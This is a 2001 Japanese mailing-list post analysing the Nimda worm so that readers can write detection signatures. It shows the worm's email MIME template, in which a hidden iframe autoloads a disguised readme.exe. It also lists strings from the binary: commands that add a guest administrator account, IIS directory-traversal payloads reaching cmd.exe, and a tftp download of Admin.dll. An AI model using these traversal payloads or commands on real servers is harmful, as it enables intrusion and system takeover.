[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[connect24h:04698] Nimda signature
- To: connect24h@xxxxxxxxxxxxxxxxxxxx
- Subject: [connect24h:04698] Nimda signature
- From: Koga Youichirou <y-koga@xxxxxxxxxxxxxxxx>
- Date: Wed, 19 Sep 2001 20:29:25 +0900 (JST)
Hiroshi Tsukamoto <hirobo-24@xxxxxxx>:
> あ、参考になります。というか今朝書いたsnortのルールにこの
> メールがひっかかってたまげました。(^^;)
メールについては、以下が文字列固定部分だと思います。
BEGIN-----------------------------------------------------
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
--====_ABC1234567890DEF_====
END-------------------------------------------------------
あと、readme.exe を strings してみたら、
GET %s HTTP/1.0
Host: www
Connnection: close
なんてのがありました。
HTTP での攻撃については、Host: www と Connection: close とあわせる
と Nimda を引っかけることができるかもしれません。
----
こがよういちろう
# strings 結果を見ると、
# user guest ""
# localgroup Administrators guest /add
# localgroup Guests guest /add
# user guest /active
# open
# user guest /add
# なんてのもある。
# /scripts
# /MSADC
# /scripts/..%255c..
# /_vti_bin/..%255c../..%255c../..%255c..
# /_mem_bin/..%255c../..%255c../..%255c..
# /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
# /scripts/..%c1%1c..
# /scripts/..%c0%2f..
# /scripts/..%c0%af..
# /scripts/..%c1%9c..
# /scripts/..%%35%63..
# /scripts/..%%35c..
# /scripts/..%25%35%63..
# /scripts/..%252f..
# /root.exe?/c+
# /winnt/system32/cmd.exe?/c+
# net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
# tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
# なんてのも。
------------------------------------------------------------------------
ニュース速報! はインフォシークで!!
http://www.infoseek.co.jp/Home?pg=Home.html&svx=971122